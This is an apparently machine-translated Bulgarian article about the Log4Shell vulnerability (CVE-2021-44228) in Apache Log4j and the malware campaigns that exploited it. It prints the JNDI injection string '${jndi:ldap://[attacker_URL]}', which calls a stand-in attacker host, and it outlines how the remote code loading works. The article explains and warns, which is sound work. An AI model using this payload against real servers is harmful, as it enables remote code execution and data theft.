Уязвимост на Log4Shell

На 10 декември 2021 г. беше пусната експлойт за критична уязвимост в базираната на Java платформа за регистриране на Apache Log4jпублично. Проследена като CVE-2021-44228 или Log4Shell, уязвимостта засяга версиите на Log4j от Log4j 2.0-beta9 и до 2.14.1. Заплахите могат да се възползват от експлойта, за да установят неудостоверен отдалечен достъп, да изпълнят код, да доставят заплахи от злонамерен софтуер или да събират информация. На уязвимостта е присвоен критичен статус, тъй като Log4j се използва широко от корпоративни приложения и облачни услуги.

Технически подробности за Log4Shell

Експлойтът започва със заплахата, която променя потребителския агент на своя уеб браузър. След това посещават сайт или търсят конкретен низ, присъстващ на уебсайтове с формат:

${jndi:ldap://[attacker_URL]}

В резултат на това низът ще бъде добавен към регистрационните файлове за достъп на уеб сървъра. След това нападателите чакат приложението Log4j да анализира тези регистрационни файлове и да достигне до добавения низ. В този случай грешката ще се задейства, карайки сървъра да направи обратно извикване към URL адреса, присъстващ в низа JNDI. Този URL адрес се злоупотребява за обработка на кодирани в Base64 команди или Java класовевпоследствие и ги изпълнете на компрометираното устройство.

Apache бързо пусна нова версия - Log4j 2.15.0, за да адресира и коригира експлойта, но значително количество уязвими системи може да останат непоправени за дълъг период от време. В същото време участниците в заплахите бързо забелязаха уязвимостта на Log4Shell с нулев ден и започнаха да сканират за подходящи сървъри, които да експлоатират. Общността на infosec е проследила множество кампании за атаки, използващи Log4Shell, за да доставят широк набор от заплахи от зловреден софтуер.

Log4Shell се използва при криптомайнер, ботнет, бекдор и атаки за събиране на данни

Едни от първите участници в заплахите, които внедриха Log4Shell в своите операции, бяха киберпрестъпниците зад ботнета за крипто копаене на Kinsing. Хакерите използваха Log4Shell, за да доставят Base64-кодирани полезни товари и да изпълняват шел скриптове. Ролята на тези скриптове е да почистят целевата система от конкурентни заплахи за копаене на криптовалута, преди техният собствен злонамерен софтуер Kinsing да бъде изпълнен.

Netlab 360 откри заплахи, използващи уязвимостта за инсталиране на версии на ботнет Mirai и Muhstik на пробитите устройства. Тези заплахи за злонамерен софтуер са предназначени да добавят заразени системи в мрежа от IoT устройства и сървъри, които след това нападателите могат да инструктират да стартират DDoS (разпределен отказ на услуга) атаки или да разположат крипто-майнеривпоследствие.

Според Центъра за разузнаване на заплахите на Microsoft, експлойтът Log4j също е бил насочен към кампании за атака, изпускащи маяци Cobalt Strike. Cobalt Strike е легитимен софтуерен инструмент, използван за тестване на проникване срещу системите за сигурност на компанията.Въпреки това, неговите бекдор възможности го превърнаха в обща част от арсенала на многобройни групи заплахи. След това незаконният бекдор достъп до мрежата на жертвата се използва за доставяне на полезни натоварвания на следващия етап, като рансъмуер, кражби на информация и други заплахи за злонамерен софтуер.

Log4Shell може да се използва за придобиване на променливи на средата, съдържащи сървърни данни. По този начин нападателите могат да получат достъп до името на хоста, името на ОС, номера на версията на ОС, потребителското име, под което се изпълнява услугата Log4j и др.